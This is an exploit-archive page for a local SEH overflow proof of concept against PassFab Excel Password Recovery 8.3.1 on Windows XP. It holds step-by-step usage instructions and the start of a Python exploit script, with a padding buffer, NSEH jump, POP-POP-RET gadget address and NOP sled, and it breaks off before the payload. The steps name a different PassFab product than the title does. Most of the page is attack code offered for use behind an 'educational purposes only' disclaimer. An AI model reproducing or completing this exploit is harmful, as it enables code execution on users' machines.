Exploits / Vulnerability Discovered : 2019-02-01 |
Type : local |
Platform : windows
This exploit / vulnerability Passfab excel password recovery 8.3.1 seh local exploit is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: PassFab Excel Password Recovery SEH Local Exploit
# Date: 31.01.19
# Vendor Homepage:https://www.passfab.com/products/excel-password-recovery.html
# Software Link: https://www.passfab.com/downloads/passfab-excel-password-recovery.exe
# Exploit Author: Achilles
# Tested Version: 8.3.1
# Tested on: Windows XP SP3
# 1.- Run python code : PassFab_RAR
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open PassFab RAR Password Recovery
# 4.- In the new Window click on the key in the upper right corner
# 5.- Paste the content of EVIL.txt into the Field: 'Licensed E-mail and Registration Code'
# 6.- Click 'Register'and the calculator will open
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer = "\x41" * 260
NSEH = "\xeb\x06\x90\x90" #jmp short 6
SEH = struct.pack('<L',0x100674dd) #pop pop ret SoftwareLog.dll
nops = "\x90" * 20